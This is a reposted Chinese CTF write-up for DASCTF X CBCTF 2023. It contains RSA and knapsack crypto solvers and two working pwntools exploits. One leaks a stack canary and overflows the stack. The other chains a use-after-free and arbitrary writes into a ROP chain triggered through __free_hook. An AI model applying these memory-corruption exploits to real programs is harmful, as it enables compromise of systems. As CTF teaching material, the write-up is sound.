DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

admin
admin
admin
102360
文章
87
评论
2024年2月15日11:16:13评论12 views字数 10375阅读34分35秒阅读模式

EDI

JOIN US ▶▶▶

招新

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。

欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn方向的师傅)有意向的师傅请联系邮箱[email protected][email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Crypto

1

ezrsa

#!/usr/bin/env python3# -*- coding: utf-8 -*-# @Time    : 2023/10/21 11:31import binasciifrom sage.all import *n1 = 65634094430927080732256164808833233563732628654160389042977689628512527168256899310662239009610512772020503283842588142453533499954947692968978190310627721338357432052800695091789711809256924541784954080619073213358228083200846540676931341013554634493581962527475555869292091755676130810562421465063412235309n2 = 103670293685965841863872863719573676572683187403862749665555450164387906552249974071743238931253290278574192713467491802940810851806104430306195931179902098180199167945649526235613636163362672777298968943319216325949503045377100235181706964846408396946496139224344270391027205106691880999410424150216806861393(e1, noise1, c1) = (1743, 44560588075773853612820227436439937514195680734214431948441190347878274184937952381785302837541202705212687700521129385632776241537669208088777729355349833215443048466316517110778502508209433792603420158786772339233397583637570006255153020675167597396958251208681121668808253767520416175569161674463861719776, 65643009354198075182587766550521107063140340983433852821580802983736094225036497335607400197479623208915379722646955329855681601551282788854644359967909570360251550766970054185510197999091645907461580987639650262519866292285164258262387411847857812391136042309550813795587776534035784065962779853621152905983)(e2, noise2, c2) = (1325, 35282006599813744140721262875292395887558561517759721467291789696459426702600397172655624765281531167221787036009507833425145071265739486735993631460189629709591456017092661028839951392247601628468621576100035700437892164435424035004463142959219067199451575338270613300215815894328788753564798153516122567683, 50327632090778183759544755226710110702046850880299488259739672542025916422119065179822210884622225945376465802069464782311211031263046593145733701591371950349735709553105217501410716570601397725812709771348772095131473415552527749452347866778401205442409443726952960806789526845194216490544108773715759733714)enc = 124349762993424531697403299350944207725577290992189948388824124986066269514204313888980321088629462472088631052329128042837153718129149149661961926557818023704330462282009415874674794190206220980118413541269327644472633791532767765585035518183177197863522573410860341245613331398610013697803459403446614221369def attack(c1, c2, e1,e2,noise1,noise2,n2):    PR = PolynomialRing(Zmod(n2), name='x')    x = PR.gen()    g1 = (x + noise1) ** e1 - c1    g2 = (x + noise2) ** e2 - c2    def gcd(g1, g2):        while g2:            g1, g2 = g2, g1 % g2        return g1.monic()    return -gcd(g1, g2)[0]m1 = attack(c1,c2,e1,e2,noise1,noise2,n2)print(m1)p=13189337905641321257372188436353844418280745284875462357019668708167547026960641869513283218672677712590326347601424108528959315675307896082223561007980457with open("enc.txt","r") as f:    cipher=f.read()    c1=[]    ci=cipher.split("n")    c=[]    for t in ci:        try:            t=int(t)            c.append(t)        except:            passq=""for s in c:    if jacobi_symbol(s,n1)==1:        q +="1"    else:        q+="0"print(int(q[::-1],2))q=int(q[::-1],2)moduls=p*qphi=(p-1)*(q-1)import gmpy2d=gmpy2.invert(65537,phi)print(d)d=int(d)m=pow(enc,d,moduls)from Crypto.Util.number import *print(long_to_bytes(m))

2

CBbackpack

每6位一组,一共8组,一共48位

每组0,1各有3个,一共有$C^3_6$=20种可能

利用中间相遇攻击爆破

l=[65651991706497, 247831871690373, 120247087605020, 236854536567393, 38795708921144, 256334857906663, 120089773523233, 165349388120302, 123968326805899, 79638234559694, 259559389823590, 256776519514651, 107733244474073, 216508566448440, 39327578905012, 118682486932022, 263357223061004, 132872609024098, 44605761726563, 24908360451602, 237906955893793, 204469770496199, 7055254513808, 221802659519968, 169686619990988, 23128789035141, 208847144870760, 272339624469135, 269511404473473, 112830627321371, 73203551744776, 42843503010671, 118193938825623, 49625220390324, 230439888723036, 241486656550572, 107149406378865, 233503862264755, 269502011971514, 181805192674559, 152612003195556, 184127512098087, 165959151027513, 188723045133473, 241615906682300, 216101484550038, 81190147709444, 124498742419309]x=4051501228761632import itertoolsll=[]for i in range(8):    tt=itertools.combinations(l[i*6:6*(i+1)],3)    t=[sum(j) for j in tt]    ll.append(t)ll1=ll[:4]ll2=ll[4:]llll1=[]for i in ll1[0]:    for j in ll1[1]:         for k in ll1[2]:             for s in ll1[3]:                llll1.append(i+j+k+s)llll2=[]for i in ll2[0]:    for j in ll2[1]:         for k in ll2[2]:             for s in ll2[3]:                llll2.append(i+j+k+s)llll2=[x-i for i in llll2]for i in range(36600,len(llll1)):    print(i)    if llll1[i] in llll2:        print(i,llll2.index(llll1[i]))        a,b=[i],[llll2.index(llll1[i])]        a=divmod(a[0],20)        a=divmod(a[0],20)+a[1:]        a=divmod(a[0],20)+a[1:]        b=divmod(b[0],20)        b=divmod(b[0],20)+b[1:]        b=divmod(b[0],20)+b[1:]        ab=a+b        break# ...# 36690 141524assert sum([ll[i][ab[i]] for i in range(8)])==xindex=list(itertools.combinations([0,1,2,3,4,5],3))q=[index[i] for i in ab]ml=[]for i in q:    mll=[0]*6    for j in i:        mll[j]=1    ml+=mllimport hashlibflag = 'DASCTF{'+hashlib.sha256(''.join([str(i) for i in ml]).encode()).hexdigest()+'}'print(flag)

02

Pwn

1

Guestbook

泄露canary 后栈溢出。

from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context.terminal = ['tmux','splitw','-h']filename = './GuestBook'debug = 0ip = 'node4.buuoj.cn'port = 26998if debug:    p = process(filename)else:    p  = remote(ip,port)ru      = lambda a:     p.recvuntil(a)r       = lambda n:     p.recv(n)sla     = lambda a,b:   p.sendlineafter(a,b)sa      = lambda a,b:   p.sendafter(a,b)sl      = lambda a:     p.sendline(a)s       = lambda a:     p.send(a)l32     = lambda  :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))l64     = lambda  :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))uu32    = lambda  :u32(p.recv(4).ljust(4,b'x00'))uu64    = lambda  :u64(p.recv(6).ljust(8,b'x00'))int16   = lambda data   :int(data,16)lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))def inter() : p.interactive()def debu(cmd=''):    gdb.attach(p,cmd)    pause()def get_addr():     return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc):     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) :     return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)sla(b'name: ',b'a'*24)ru(b'a'*24)canary = u64(r(0x8))print("canary :",hex(canary))#debu('b *0x40143f')sla(b'leave(MAX 4): ',b'4')for i in range(2):    sl(b'aaaa')payload = b'b'*(0x38+0x20)+p64(canary+0x6)+b'c'*0x8+p64(0x00000000004012c0)sl(payload)sl(b'b'*0x38+b'x00')inter()

2

EASYBOX

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

3

Binding

这一题在比赛期间没有做出来,非常可惜,感觉最后就差一点点,就是临门一脚的事情,所以赛后又花了点时间仔细看了看这道题,花了一个多小时就出了,难度算比较中等水平,主要是中间卡了很长一段时间。

这一题漏洞也非常简单,一是UAF 漏洞。

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

二是存在任意地址写,但是只能写一次,并且每次只能写1个字节,并且会把高7字节覆写为x00

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

基本思路就是:

1.通过UAF漏洞来泄露 libc 的基地址,接着得到 environ 地址以此泄露栈地址,然后通过栈地址来泄露出 ELF 基地址。(一开始是尝试通过 environ+0x20 来泄露出 ELF 基地址,但是打印会被截断,寄 ),show 函数来泄露堆地址。

2.通过edit 函数修改EDIT_TIME为0xff,使得可以任意次数修改。

3.在栈上构造ORW的ROP链。(当时快结束时,已经做完这一步,但是main居然没有正常返回,然后无了)

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

4.最后在 free_hook 地址位置写上 setcontext+0x3d ,使得跳转到构造的ROP链上。

from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context.terminal = ['tmux','splitw','-h']filename = './binding'debug = 0ip = '127.0.0.1'port = 9999libc = ELF('/home/roach/glibc-patcher/libs/amd64/2.31-0ubuntu9.9_amd64/libc.so.6')if debug:    p = process(filename)   else:    p  = remote(ip,port)ru      = lambda a:     p.recvuntil(a)r       = lambda n:     p.recv(n)sla     = lambda a,b:   p.sendlineafter(a,b)sa      = lambda a,b:   p.sendafter(a,b)sl      = lambda a:     p.sendline(a)s       = lambda a:     p.send(a)l32     = lambda  :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))l64     = lambda  :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))uu32    = lambda  :u32(p.recv(4).ljust(4,b'x00'))uu64    = lambda  :u64(p.recv(6).ljust(8,b'x00'))int16   = lambda data   :int(data,16)lg      = lambda s, num :p.success('%s -> 0x%x' % (s, num))def inter() : p.interactive()def debu(cmd=''):    gdb.attach(p,cmd)    pause()def get_addr():     return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc):     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) :     return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)def add(idx,size,content):    sla(b'choice:',b'1')    sla(b'Idx:',str(idx).encode())    sla(b'Size:',str(size).encode())    sa(b'Content:',content)def edit(idx,content1,content2):    sla(b'choice:',b'2')    sla(b'Idx:',str(idx).encode())    sa(b'context1: n',content1)    sa(b'context2: n',content2)def show(idx,choice):    sla(b'choice:',b'3')    sla(b'choice:',choice)    sla(b'Idx:',str(idx).encode())def delete(idx):    sla(b'choice:',b'4')    sla(b'Idx:',str(idx).encode()) for i in range(0xb):    add(i,0x150,b'a'*8)for i in range(0x8):    delete(i)show(7,b'0')ru(b'context: ')leak = get_addr()print("leak : ",hex(leak))libc_base = leak - 0x1ecbe0print("libc_base : ",hex(libc_base))stack_addr = libc_base+libc.sym['environ']print("stack  address : ",hex(stack_addr))payload = b'a'*(0x150+0x8)+p64(0x110)+p64(stack_addr)add(0xb,0x1e0,payload)show(7,b'0')ru(b'context: ')stack = get_addr()-0x100print("stack : ",hex(stack))delete(8)payload = b'a'*(0x1d0+0x8)+p64(0x110)+p64(stack-0x20)add(0xc,0x200,payload)show(8,b'0')ru(b'context: ')elf_base = u64(r(6).ljust(8, b'x00'))-0x1990print("elf_base : ",hex(elf_base))#debu('b show')show(0xb,b'1')r(9)heap = u64(r(6).ljust(8, b'x00'))print("heap : ",hex(heap))edit(9,p64(elf_base+0x4010),p64(0xff))pop_rdi = elf_base+0x0000000000001a13pop_rsi = libc_base+0x000000000002601fpop_rdx = libc_base+0x0000000000142c92openfile = libc_base+libc.sym['open']readfile = libc_base+libc.sym['read']writefile = libc_base+libc.sym['write']exits = libc_base+libc.sym['exit']payload = p64(heap+0xbf0)+p64(pop_rsi)+p64(0x0)+p64(openfile)payload += p64(pop_rdi)+p64(0x3)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x100)+p64(readfile)payload += p64(pop_rdi)+p64(0x1)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x100)+p64(writefile)payload += p64(pop_rdi)+p64(0x0)+p64(exits)'''0x0000000000151990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]'''for i in range(len(payload)):    edit(9,p64(stack+i),payload[i:i+1].ljust(8,b'x00'))free_hook = libc_base+libc.sym['__free_hook']setcontext = libc_base+libc.sym['setcontext']+0x3dmagic_gadgets = libc_base+0x0000000000151990#debu('b *$rebase(0x16a0)')for i in range(8):    edit(9,p64(free_hook+i),p64(magic_gadgets)[i:i+1].ljust(8,b'x00'))#0xe -> address = heap+0xbe0payload2 = p64(0x0)+p64(heap+0xbe0)+b'./flagx00x00'+p64(0x0)+p64(setcontext)payload2 = payload2.ljust(0xa0,b'x00')payload2 = payload2+p64(stack)+p64(pop_rdi)add(0xd,0x150,payload2)print("setcontext : ",hex(setcontext))print("magic gadgets :",hex(magic_gadgets))print("free hook :",hex(free_hook))print("libc_base : ",hex(libc_base))print("stack : ",hex(stack))print("elf_base : ",hex(elf_base))print("heap : ",hex(heap))#debu()delete(0xd)inter()

EDI安全

DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

原文始发于微信公众号(EDI安全):DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日11:16:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEChttp://cn-sec.com/archives/2197498.html

发表评论

匿名网友 填写信息